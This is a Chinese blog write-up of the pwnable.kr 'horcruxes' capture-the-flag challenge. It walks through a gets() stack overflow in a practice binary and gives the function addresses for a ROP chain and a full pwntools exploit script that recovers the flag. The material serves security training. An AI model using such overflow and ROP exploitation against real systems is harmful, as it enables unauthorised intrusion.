pwnable.kr horcruxes

最新推荐文章于 2020-08-14 21:23:07 发布
最新推荐文章于 2020-08-14 21:23:07 发布
阅读量336 收藏
点赞数
分类专栏: PWN练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/r250414958/article/details/105455891
版权

在这里插入图片描述
看题目,好像是和ROP利用技术有相关的题目,上去看看先
在这里插入图片描述
告诉我们要链接端口9032执行,我们先把文件下下来看看,由于没有提供源码,我们直接用IDA看
函数也不长,直接看伪代码

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v3; // ST1C_4

  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 2, 0);
  alarm(0x3Cu);
  hint();
  init_ABCDEFG();
  v3 = seccomp_init(0);
  seccomp_rule_add(v3, 2147418112, 173, 0);
  seccomp_rule_add(v3, 2147418112, 5, 0);
  seccomp_rule_add(v3, 2147418112, 3, 0);
  seccomp_rule_add(v3, 2147418112, 4, 0);
  seccomp_rule_add(v3, 2147418112, 252, 0);
  seccomp_load(v3);
  return ropme();
}

直接看ropme()

int ropme()
{
  char s[100]; // [esp+4h] [ebp-74h]
  int v2; // [esp+68h] [ebp-10h]
  int fd; // [esp+6Ch] [ebp-Ch]

  printf("Select Menu:");
  __isoc99_scanf("%d", &v2);
  getchar();
  if ( v2 == a )
  {
    A();
  }
  else if ( v2 == b )
  {
    B();
  }
  else if ( v2 == c )
  {
    C();
  }
  else if ( v2 == d )
  {
    D();
  }
  else if ( v2 == e )
  {
    E();
  }
  else if ( v2 == f )
  {
    F();
  }
  else if ( v2 == g )
  {
    G();
  }
  else
  {
    printf("How many EXP did you earned? : ");
    gets(s);
    if ( atoi(s) == sum )
    {
      fd = open("flag", 0);
      s[read(fd, s, 0x64u)] = 0;
      puts(s);
      close(fd);
      exit(0);
    }
    puts("You'd better get more experience to kill Voldemort");
  }
  return 0;
}

漏洞点也很明显了在gets(s);变量s是一个栈地址,而getflag的条件就是if ( atoi(s) == sum ),这个sum在哪里被赋值了我们可以交叉引用看一下
在这里插入图片描述

unsigned int init_ABCDEFG()
{
  int v0; // eax
  unsigned int result; // eax
  unsigned int buf; // [esp+8h] [ebp-10h]
  int fd; // [esp+Ch] [ebp-Ch]

  fd = open("/dev/urandom", 0);
  if ( read(fd, &buf, 4u) != 4 )
  {
    puts("/dev/urandom error");
    exit(0);
  }
  close(fd);
  srand(buf);
  a = 0xDEADBEEF * rand() % 0xCAFEBABE;
  b = 0xDEADBEEF * rand() % 0xCAFEBABE;
  c = 0xDEADBEEF * rand() % 0xCAFEBABE;
  d = 0xDEADBEEF * rand() % 0xCAFEBABE;
  e = 0xDEADBEEF * rand() % 0xCAFEBABE;
  f = 0xDEADBEEF * rand() % 0xCAFEBABE;
  v0 = rand();
  g = 0xDEADBEEF * v0 % 0xCAFEBABE;
  result = f + e + d + c + b + a + 0xDEADBEEF * v0 % 0xCAFEBABE;
  sum = result;
  return result;
}

也就是um = a + b + c + d + e + f + g,而这七个数值是随机生成的。我们回过ropme函数里看看,也有对应的字母的函数

int A()
{
  return printf("You found \"Tom Riddle's Diary\" (EXP +%d)\n", a);
}
...

这里省略去后面的函数,因为都是一样的功能,把对应自身字母的数值给打印出来然后返回。
我们再查看一下程序开启的保护
在这里插入图片描述
发现程序没有开启PIE也就是ASLR随机地址载入的保护机制,
同样没有发现Canary对栈指针进行保护。但是可以明显发现该程序实现了NX栈不可执行的保护。
到这里,利用思路大概就有了
首先在IDA pro反汇编出的伪代码中已经标记出了sbuffer的大小和起始地址:[ebp - 0x74]
在这里插入图片描述
基于此我们可以推断出buffer的起始地址到ropme()反回地址的距离应该为0x74 + 4。
多出的这4个bytes长度是存放原函数ebp地址的数据长度。所以可以初步判断
padding的大小为0x78 = 120个bytes数据。
然后在后面追加每个对应 a + b + c + d + e + f + g地址的rop链,获取数值计算,最后返回到main函数中调用ropme()函数的地方执行ropme()
然后再把计算好的sum输入进去,就可以getflag
在IDA里把对应的函数地址找到

call A() --> 0x809fe4b
call B() --> 0x809fe6a
call C() --> 0x809fe89
call D() --> 0x809fea8
call E() --> 0x809fec7
call F() --> 0x809fee6
call G() --> 0x809ff05
main <call ropme> --> 0x809fffc

所以构造出的payload为:

'A' * 120 + 0x809fe4b + 0x809fe6a + 0x809fe89 + 0x809fea8 + 0x809fec7 + 0x809fee6 + 0x809ff05 + 0x809fffc

用pwntools写是这样的

from ctypes import c_int
from pwn import *
from pwnlib.util.proc import wait_for_debugger
context.arch = 'i386'

context.log_level = 'debug'

#s = ssh("horcruxes", "pwnable.kr", port=2222, password="guest")
#p = s.connect_remote('localhost', 9032)

p = process('./horcruxes',stdin=PTY)
wait_for_debugger(p.pid)
#r = remote('pwnable.kr', 9032) 

padding = 'A' * 0x78
A = 0x0809FE4B
B = 0x0809FE6A
C = 0x0809FE89
D = 0x0809FEA8
E = 0x0809FEC7
F = 0x0809FEE6
G = 0x0809FF05
ropme = 0x0809FFFC
stage1 = flat(padding, A, B, C, D, E, F, G, ropme,endianness='little', word_size=32, sign=False)

p.recvuntil('Menu:')
p.sendline('1')
p.recvuntil('earned? : ')
p.sendline(stage1)

s = 0 
for i in xrange(7):
    p.recvuntil('EXP +')
    s += int(p.recvline()[:-2])
    #s &= 0xffffffff

s = c_int(s).value
p.recvuntil('Menu:')
p.sendline('1')
p.recvuntil('earned? : ')
p.sendline(str(s))
print p.recvline()

这是我本地调试时候用的,如果要连上pwnable.kr则要把注释去掉,再注释掉dbg的代码就可以了

这里我用本地调试的代码说明
可以看到执行后堆栈被覆盖
在这里插入图片描述
retn的时候已经进入我们准备的rop链
在这里插入图片描述
等rop链完成后我们再次进入ropme(),输入了正确的sum,然后成功跳转到获取flag的流程中了
在这里插入图片描述
还有网上很多大佬的wp都说不能直接返回ropme()函数里面的任何一个位置,我尝试了一下,产生了如下错误
在这里插入图片描述
查了一下错误提示,大概意思是

当应用程序尝试访问未分配的存储区/无效的存储区/对该应用程序的未对齐访问时,将发生SIGSEGV问题

这里我也没有去深入研究,望知道的大佬教教弟弟

这里再记一个小坑,在我准备调试程序的时候发现
在这里插入图片描述
缺少库文件
然后我使用了如下命令去更新

sudo apt-get update && sudo apt-get install libseccomp2

发现还是没有解决这个错误,然后又找了好久,直到看到了这个帖子

https://askubuntu.com/questions/721357/is-it-safe-to-install-old-libraries-wine-issue

才发现原来是32位程序的问题,需要这样改一下

sudo apt-get update && sudo apt-get install libseccomp2:i386

我哭了:(
在这里插入图片描述

QQQqQqqqqrrrr
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
horcrux:将您的文件分割成加密的片段,这样您就无需记住密码了
04-05
Horcrux 将您的文件拆分为加密的内容,这样您就无需记住密码了 怎么运行的 horcrux有两个命令, split和bind 。 分裂 如果我在当前目录中有一个名为diary.txt的文件,我可以调用 horcrux split diary.txt 它会提示我要多少次曲折,以及需要多少次才能恢复原始文件。 例如,如果我有3个,我可能想要5个horcruxes来恢复该文件。该horcrux文件将按以下方式创建: diary_1_of_5.horcrux diary_2_of_5.horcrux ... 现在,您只需要在各种USB或在线位置上散布房屋周围的杂物,并希望您能回忆起它们的全部位置! 捆绑 要将魂器绑定回原始文件,只需调用 horcrux bind 在包含魂器的目录中(或将目录作为参数传递)。 安装 通过自制程序: brew install jesseduffield/ho
PWN horcruxes [pwnable.kr]CTF writeup题解系列15
重新启程
01-06 779
题目内容: 先连接上去看看题目文件,看起来已经说了是一道rop的题目 root@mypwn:/ctf/work/pwnable.kr# ssh horcruxes@pwnable.kr -p2222 horcruxes@pwnable.kr's password: ____ __ __ ____ ____ ____ _ ___ __ ...
pwnable.kr 入门pwn系列教程(1)
NoOneGroup
07-24 3061
博客已经转移 https://noone-hub.github.io/ 前言: 前段时间学了一段时间pwn,因为某些事断了下来,现在开始重新学习,现在立志要真正入门pwn,会编写漏洞利用(利用pwntools),会基本linux命令,因为pwn题目很多都是在linux下的,比较少在windows下。 正文: 今天通过pwnable.kr的第一道题目fd来学习pwn 题目就是这样,题目最...
MymetroapphasanerrorafterSystemWin8Updating.
awulei的专栏
10-11 6018
问题 问题 学习 JavaScript 其中一个标志就是理解下面两种写法,会输出有不一样的结果。 在上面的代码中,虽然 obj.foo 和 foo 指向同一个函数,但是执行结果不一样。 请看下面的示例。 形成这种差异的原因,就在于函数体内部使用了 this 关键字。在指导用书上, this http://baobao.baidu.com/article/1d5ded3c5c064a2988f0ed...
pwnable.kr之flag
river
05-02 2574
flag   下载下来是upx 压缩过的文件,用upx –d 解压一下,变为flag_upacked_upx文件,然后再IDA中看。   对flag_upacked_upx用strings 看一下,提取:)特征。(因为这个是pwnable.kr的flag的特征。。。又作弊了) 发现是正确的。。 flag: UPX...? sounds like a deli
pwnable.krhorcruxes - 伏地魔的7个魂器 gets栈溢出 截断 atoi转化
think_ycx的专栏
11-24 1541
本关信息 伏地魔吧自己分裂的灵魂藏在了7哥魂器中…这个描述666。本关要求我们找到所有的魂器然后ROP似乎就可以拿flag了。本关没有给源码,上IDA分析吧。本地运行前安装32位libseccomp库,apt-get install libseccomp-dev:i386。 init初始化abcdefg7个int值,保存在bss段,并计算sum。abcdefg的值生成时使用随机数做为种...
horcruxes-pwnable
SkYe's Blog
10-04 712
前言 这题考的是ROP系统攻击。百度百科是这样介绍的: 简介:ROP全称为Return-oriented Programming(面向返回的编程)。是一种基于代码复用的攻击技术,攻击者从已有的库或可执行文件中提取指令片段,构建恶意代码。 内在特征:1. ROP控制流中,call和ret指令不操纵函数,而是用于将函数里面的短指令序列的执行流串起来,但在正常的程序中,call和ret分别代表函数的开...
ROP攻击:Challenge 0x14: Horcruxes
jiuweideqixu的博客
08-14 315
Voldemort concealed his splitted soul inside 7 horcruxes. Find all horcruxes, and ROP it! author: jiwon choi ssh horcruxes@pwnable.kr -p2222 (pw:guest) 登录进去之后发现,只有二进制可执行文件,没有源文件。所以为了加快分析,需要借助ida的反编译功能。 反编译之后,可以看到各个函数的结构如下: int A() { return prin.
全面剖析Pwnable.kr unlink
Bill
08-10 2095
   最近一直在学习堆方面的知识,unlink是CTF中考察堆方面知识的重点.于是就拿一道简单的例题来剖析一下.堆方面的PWN对内存的分配和回收机制要求比较高,也是CTF中压轴题. 目录: 知识简介 漏洞分析 漏洞利用 Write Up及相关链接 知识简介: 为了节约内存,被使用之后的chunk和未使用的chunk的内存布局不相同,但是都用了相同的大小,于是free...
pwnable.kr详细通关秘籍(二)
dfdhxb995397的博客
09-27 375
i春秋作家:W1ngs 原文来自:pwnable.kr详细通关秘籍(二) 0x00 input 首先看一下代码: 可以看到程序总共有五步,全部都满足了才可以得到flag,那我们就一步一步来看 这道题考到了很多linux下的基本操作,参数输入、管道符、进程间通信等知识,推荐大家可以先看看《深入理解计算机系统这本书》,补补基础 1、Step1(argv) if(ar...
horcrux-ui:horcrux的GUI
03-18
则可以选择该文件并将其拆分为horcruxes,如下所示创建文件: diary_1_of_5.horcruxdiary_2_of_5.horcrux...现在,您只需要将各种杂物散布在房屋的各个USB或在线位置上,并希望您能回忆起它们的全部位置!或通过多种...
wooyun 历史资源汇总
think_ycx的专栏
10-05 1829
wooyun镜像 https://wy.tuisec.win/ 相关repo:https://github.com/hanc00l/wooyun_public (含虚拟机下载) drops 在线版1 https://drops.thinkycx.me 相关repo1https://github.com/SuperKieran/WooyunDrops . 图片htt...
pwnable.kr-passcode WP
Casuall的博客
03-30 463
首先用ssh连进去,一个可执行文件,一个源码文件,一个flag文件,先执行passcode程序,让你输入name,passcode1,passcode2,如图。 我们先用scp命令把文件拷贝下来,scp -P2222 passcode@pwnable.kr:passcode . ,注意后面有一个点,表示拷贝到当前目录的意思。然后看一下源码 #include <stdio.h> #in...
一次受益颇多的CTF(RE/PWN)
蚁景网安学院
02-18 876
##前言这个是Hgame_CTF第三周的题目,难度一周比一周大,而且还涉及了多方面的知识,一整期做下来对或许会有一个比较大的提升。其中有一道逆向,是通过监控本地端口来获取输入的,第一次接...
【glibc】浅析 __builtin_expect
think_ycx的专栏
11-27 917
大约一年之前看过,今天又看了一遍。总结一下。 对于程序员来说,有时我们是知道if判断之后最有可能会去执行哪个分支的。 对于CPU而言,流水线机制使得CPU会在执行当前指令时,就已经会完成对下一条指令的取指操作。如果下一条已经取出来的指令没有被执行,取指操作就浪费了!如果执行了,就节省了取指令的操作。 为了不让CPU浪费取指操作,我们需要让执行if判断后,下一条指令是最有可能被执行的指令。对应...
pwnable 笔记 Rookiss - brain fuck - 150 pt
HiTaQini
12-15 3062
终于打到第二关了... 这题考察GOT覆写
pwnable.kr】 blukat - 权限设置不当导致password可读
think_ycx的专栏
11-24 683
本关描述 这一关看着描述就挺奇怪的,scp下来之后居然把password改copy下来了,内容是cat: password: Permission denied。照理没有权限读的话是不会copy下来的。ssh上去看一下就明白了(如下图),当前用户在blukat_pwn组,因此是可以读password的。 看一下代码写的没问题,读取password和输入比较,如果比较成功就输出flag。...
pwnable.kr 1-6...
sopora的博客
04-24 185
1.fd char buf[32]; int main(int argc, char* argv[], char* envp[]){ if(argc<2){ printf("pass argv[1] a number\n"); return 0; } int fd = atoi( ...
pwnable.kr】fb
weixin_30785593的博客
06-29 146
这是pwnable.kr的签到题,记录pwn入门到放弃的第一篇。 ssh fd@pwnable.kr -p2222 (pw:guest) 题目很简单,登录上了ssh后,发现了3个文件:fd,fd.c,flag 首先下载fd.c 1 #include <stdio.h> 2 #include <stdlib.h> 3 #include <str...
记一次apt-get install gcc-multilib失败的小坑
热门推荐
r250414958的博客
10-20 1万+
因为做题中要把源码下在本机(kali_64)编译一下,命令为gcc -o xxx xxx.c -m32 -lm发现gcc缺少32位的环境 网上查询使用命令apt-get install gcc-multilib,但是遇到各种报错,按照错误代码查询了一个多小时无果,最后把gcc给卸了准备重装,发现gcc也装不上了,才发现原来是kali的更新源出了问题。 最后修改更新源文件,成功安装编译,过程如下 1...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值